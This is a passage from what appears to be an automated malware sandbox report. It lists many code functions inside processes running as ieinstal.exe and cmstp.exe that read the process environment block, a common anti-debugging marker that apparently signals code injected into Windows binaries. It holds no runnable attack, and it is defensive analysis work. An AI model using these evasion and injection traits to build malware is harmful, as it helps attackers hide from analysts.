Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED44A2C mov eax, dword ptr fs:[00000030h] 18_2_1ED44A2C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED853CA mov eax, dword ptr fs:[00000030h] 18_2_1ED853CA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED853CA mov eax, dword ptr fs:[00000030h] 18_2_1ED853CA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED303E2 mov eax, dword ptr fs:[00000030h] 18_2_1ED303E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED303E2 mov eax, dword ptr fs:[00000030h] 18_2_1ED303E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED303E2 mov eax, dword ptr fs:[00000030h] 18_2_1ED303E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED303E2 mov eax, dword ptr fs:[00000030h] 18_2_1ED303E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED303E2 mov eax, dword ptr fs:[00000030h] 18_2_1ED303E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED303E2 mov eax, dword ptr fs:[00000030h] 18_2_1ED303E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED2DBE9 mov eax, dword ptr fs:[00000030h] 18_2_1ED2DBE9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3B390 mov eax, dword ptr fs:[00000030h] 18_2_1ED3B390
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED32397 mov eax, dword ptr fs:[00000030h] 18_2_1ED32397
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDC138A mov eax, dword ptr fs:[00000030h] 18_2_1EDC138A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDBD380 mov ecx, dword ptr fs:[00000030h] 18_2_1EDBD380
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED11B8F mov eax, dword ptr fs:[00000030h] 18_2_1ED11B8F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED11B8F mov eax, dword ptr fs:[00000030h] 18_2_1ED11B8F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD5BA5 mov eax, dword ptr fs:[00000030h] 18_2_1EDD5BA5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED34BAD mov eax, dword ptr fs:[00000030h] 18_2_1ED34BAD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED34BAD mov eax, dword ptr fs:[00000030h] 18_2_1ED34BAD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED34BAD mov eax, dword ptr fs:[00000030h] 18_2_1ED34BAD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD8B58 mov eax, dword ptr fs:[00000030h] 18_2_1EDD8B58
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0F358 mov eax, dword ptr fs:[00000030h] 18_2_1ED0F358
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0DB40 mov eax, dword ptr fs:[00000030h] 18_2_1ED0DB40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED33B7A mov eax, dword ptr fs:[00000030h] 18_2_1ED33B7A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED33B7A mov eax, dword ptr fs:[00000030h] 18_2_1ED33B7A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0DB60 mov ecx, dword ptr fs:[00000030h] 18_2_1ED0DB60
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDC131B mov eax, dword ptr fs:[00000030h] 18_2_1EDC131B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED9B8D0 mov eax, dword ptr fs:[00000030h] 18_2_1ED9B8D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED9B8D0 mov ecx, dword ptr fs:[00000030h] 18_2_1ED9B8D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED9B8D0 mov eax, dword ptr fs:[00000030h] 18_2_1ED9B8D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED9B8D0 mov eax, dword ptr fs:[00000030h] 18_2_1ED9B8D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED9B8D0 mov eax, dword ptr fs:[00000030h] 18_2_1ED9B8D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED9B8D0 mov eax, dword ptr fs:[00000030h] 18_2_1ED9B8D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED058EC mov eax, dword ptr fs:[00000030h] 18_2_1ED058EC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED09080 mov eax, dword ptr fs:[00000030h] 18_2_1ED09080
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED83884 mov eax, dword ptr fs:[00000030h] 18_2_1ED83884
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED83884 mov eax, dword ptr fs:[00000030h] 18_2_1ED83884
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3F0BF mov ecx, dword ptr fs:[00000030h] 18_2_1ED3F0BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3F0BF mov eax, dword ptr fs:[00000030h] 18_2_1ED3F0BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3F0BF mov eax, dword ptr fs:[00000030h] 18_2_1ED3F0BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED320A0 mov eax, dword ptr fs:[00000030h] 18_2_1ED320A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED320A0 mov eax, dword ptr fs:[00000030h] 18_2_1ED320A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED320A0 mov eax, dword ptr fs:[00000030h] 18_2_1ED320A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED320A0 mov eax, dword ptr fs:[00000030h] 18_2_1ED320A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED320A0 mov eax, dword ptr fs:[00000030h] 18_2_1ED320A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED320A0 mov eax, dword ptr fs:[00000030h] 18_2_1ED320A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED490AF mov eax, dword ptr fs:[00000030h] 18_2_1ED490AF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED20050 mov eax, dword ptr fs:[00000030h] 18_2_1ED20050
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED20050 mov eax, dword ptr fs:[00000030h] 18_2_1ED20050
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD1074 mov eax, dword ptr fs:[00000030h] 18_2_1EDD1074
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDC2073 mov eax, dword ptr fs:[00000030h] 18_2_1EDC2073
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD4015 mov eax, dword ptr fs:[00000030h] 18_2_1EDD4015
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1EDD4015 mov eax, dword ptr fs:[00000030h] 18_2_1EDD4015
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED87016 mov eax, dword ptr fs:[00000030h] 18_2_1ED87016
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED87016 mov eax, dword ptr fs:[00000030h] 18_2_1ED87016
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED87016 mov eax, dword ptr fs:[00000030h] 18_2_1ED87016
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED1B02A mov eax, dword ptr fs:[00000030h] 18_2_1ED1B02A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED1B02A mov eax, dword ptr fs:[00000030h] 18_2_1ED1B02A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED1B02A mov eax, dword ptr fs:[00000030h] 18_2_1ED1B02A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED1B02A mov eax, dword ptr fs:[00000030h] 18_2_1ED1B02A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3002D mov eax, dword ptr fs:[00000030h] 18_2_1ED3002D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3002D mov eax, dword ptr fs:[00000030h] 18_2_1ED3002D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3002D mov eax, dword ptr fs:[00000030h] 18_2_1ED3002D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3002D mov eax, dword ptr fs:[00000030h] 18_2_1ED3002D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3002D mov eax, dword ptr fs:[00000030h] 18_2_1ED3002D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED941E8 mov eax, dword ptr fs:[00000030h] 18_2_1ED941E8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0B1E1 mov eax, dword ptr fs:[00000030h] 18_2_1ED0B1E1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0B1E1 mov eax, dword ptr fs:[00000030h] 18_2_1ED0B1E1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0B1E1 mov eax, dword ptr fs:[00000030h] 18_2_1ED0B1E1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED32990 mov eax, dword ptr fs:[00000030h] 18_2_1ED32990
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED2C182 mov eax, dword ptr fs:[00000030h] 18_2_1ED2C182
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3A185 mov eax, dword ptr fs:[00000030h] 18_2_1ED3A185
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED851BE mov eax, dword ptr fs:[00000030h] 18_2_1ED851BE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED851BE mov eax, dword ptr fs:[00000030h] 18_2_1ED851BE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED851BE mov eax, dword ptr fs:[00000030h] 18_2_1ED851BE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED851BE mov eax, dword ptr fs:[00000030h] 18_2_1ED851BE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED361A0 mov eax, dword ptr fs:[00000030h] 18_2_1ED361A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED361A0 mov eax, dword ptr fs:[00000030h] 18_2_1ED361A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED869A6 mov eax, dword ptr fs:[00000030h] 18_2_1ED869A6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED2B944 mov eax, dword ptr fs:[00000030h] 18_2_1ED2B944
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED2B944 mov eax, dword ptr fs:[00000030h] 18_2_1ED2B944
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0B171 mov eax, dword ptr fs:[00000030h] 18_2_1ED0B171
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0B171 mov eax, dword ptr fs:[00000030h] 18_2_1ED0B171
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED0C962 mov eax, dword ptr fs:[00000030h] 18_2_1ED0C962
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED09100 mov eax, dword ptr fs:[00000030h] 18_2_1ED09100
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED09100 mov eax, dword ptr fs:[00000030h] 18_2_1ED09100
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED09100 mov eax, dword ptr fs:[00000030h] 18_2_1ED09100
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3513A mov eax, dword ptr fs:[00000030h] 18_2_1ED3513A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED3513A mov eax, dword ptr fs:[00000030h] 18_2_1ED3513A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED24120 mov eax, dword ptr fs:[00000030h] 18_2_1ED24120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED24120 mov eax, dword ptr fs:[00000030h] 18_2_1ED24120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED24120 mov eax, dword ptr fs:[00000030h] 18_2_1ED24120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED24120 mov eax, dword ptr fs:[00000030h] 18_2_1ED24120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED24120 mov ecx, dword ptr fs:[00000030h] 18_2_1ED24120
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047F746D mov eax, dword ptr fs:[00000030h] 27_2_047F746D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A8CD6 mov eax, dword ptr fs:[00000030h] 27_2_048A8CD6
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048914FB mov eax, dword ptr fs:[00000030h] 27_2_048914FB
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04856CF0 mov eax, dword ptr fs:[00000030h] 27_2_04856CF0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04856CF0 mov eax, dword